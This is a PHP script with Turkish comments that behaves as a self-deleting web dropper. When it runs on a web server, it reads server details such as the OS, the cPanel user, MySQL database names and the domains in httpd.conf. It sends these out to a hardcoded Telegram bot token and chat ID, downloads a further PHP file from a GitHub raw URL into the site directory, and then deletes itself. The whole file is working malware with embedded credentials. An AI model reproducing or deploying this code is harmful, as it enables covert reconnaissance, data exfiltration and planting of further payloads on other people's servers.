<?php
// Telegram Bot Token ve Chat ID
$botToken = '7778124886:AAHmf3ROPqYSulARM0Owd-tnt285xJEQOQM';
$chatId = '1561182494';
function getServerDetails() {
$directory = getcwd();
$domain = $_SERVER['SERVER_NAME'];
$ipAddress = $_SERVER['REMOTE_ADDR'];
$serverIpAddress = $_SERVER['SERVER_ADDR'];
$serverSoftware = $_SERVER['SERVER_SOFTWARE'];
$phpVersion = phpversion();
$os = php_uname();
$hostname = gethostname();
// Kullanıcı bilgilerini almak için posix_getpwuid kullanımı
if (function_exists('posix_getpwuid')) {
$userInfo = posix_getpwuid(posix_geteuid());
$cpanelUser = $userInfo['name'];
} else {
$cpanelUser = getenv('USER');
}
$loadedExtensions = get_loaded_extensions();
$databases = [];
$dbDir = '/var/lib/mysql';
if (is_dir($dbDir)) {
$databases = array_diff(scandir($dbDir), array('.', '..', 'mysql', 'performance_schema', 'information_schema'));
}
$subDomains = [];
$otherDomains = [];
$httpdConfPath = '/etc/httpd/conf/httpd.conf';
if (file_exists($httpdConfPath)) {
$httpdConf = file_get_contents($httpdConfPath);
preg_match_all('/ServerName\s+([^\s]+)/', $httpdConf, $matches);
foreach ($matches[1] as $foundDomain) {
if (strpos($foundDomain, $_SERVER['SERVER_NAME']) !== false && $foundDomain != $_SERVER['SERVER_NAME']) {
$subDomains[] = $foundDomain;
} else {
$otherDomains[] = $foundDomain;
}
}
}
$diskTotalSpace = disk_total_space("/");
$diskFreeSpace = disk_free_space("/");
$memoryUsage = memory_get_usage();
return [
'directory' => $directory,
'domain' => $domain,
'ipAddress' => $ipAddress,
'serverIpAddress' => $serverIpAddress,
'serverSoftware' => $serverSoftware,
'phpVersion' => $phpVersion,
'os' => $os,
'hostname' => $hostname,
'cpanelUser' => $cpanelUser,
'loadedExtensions' => $loadedExtensions,
'databases' => $databases,
'subDomains' => $subDomains,
'otherDomains' => $otherDomains,
'diskTotalSpace' => $diskTotalSpace,
'diskFreeSpace' => $diskFreeSpace,
'memoryUsage' => $memoryUsage,
];
}
function sendToTelegram($details, $botToken, $chatId) {
$message = "Sunucu Bilgileri:\n";
$message .= "IP Adresi: " . $details['serverIpAddress'] . "\n";
$message .= "Sunucu Yolu: " . $details['directory'] . "\n";
$message .= "Dosya Yolu: http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "\n";
$message .= "Alan Adı: " . $details['domain'] . "\n";
$message .= "Kullanıcı IP Adresi: " . $details['ipAddress'] . "\n";
$message .= "Sunucu Yazılımı: " . $details['serverSoftware'] . "\n";
$message .= "PHP Versiyonu: " . $details['phpVersion'] . "\n";
$message .= "İşletim Sistemi: " . $details['os'] . "\n";
$message .= "Host Adı: " . $details['hostname'] . "\n";
$message .= "CPanel Kullanıcı Adı: " . $details['cpanelUser'] . "\n";
$message .= "Yüklü Eklentiler: " . implode(", ", $details['loadedExtensions']) . "\n";
$message .= "Veritabanları: " . implode(", ", $details['databases']) . "\n";
$message .= "Alt Alan Adları: " . implode(", ", $details['subDomains']) . "\n";
$message .= "Diğer Alan Adları: " . implode(", ", $details['otherDomains']) . "\n";
$message .= "Disk Toplam Alanı: " . $details['diskTotalSpace'] . " bytes\n";
$message .= "Disk Boş Alanı: " . $details['diskFreeSpace'] . " bytes\n";
$message .= "Bellek Kullanımı: " . $details['memoryUsage'] . " bytes\n";
$telegramApiUrl = "https://api.telegram.org/bot$botToken/sendMessage";
$postData = [
'chat_id' => $chatId,
'text' => $message
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $telegramApiUrl);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
}
function downloadFile($url, $path) {
$fileContent = file_get_contents($url);
if ($fileContent !== false) {
return file_put_contents($path, $fileContent);
}
return false;
}
// Mevcut dosyanın konumunu al
$currentDirectory = dirname(__FILE__);
// Dosya indir ve kaydet
$fileUrl = "https://raw.githubusercontent.com/cncmedya/form/refs/heads/main/02.php";
$fileName = $currentDirectory . '/' . basename($fileUrl);
$downloaded = downloadFile($fileUrl, $fileName);
// Sunucu detaylarını al
$details = getServerDetails();
// Detayları Telegram botuna gönder
sendToTelegram($details, $botToken, $chatId);
// Dosya kendini silsin
$scriptPath = __FILE__;
unlink($scriptPath);
?>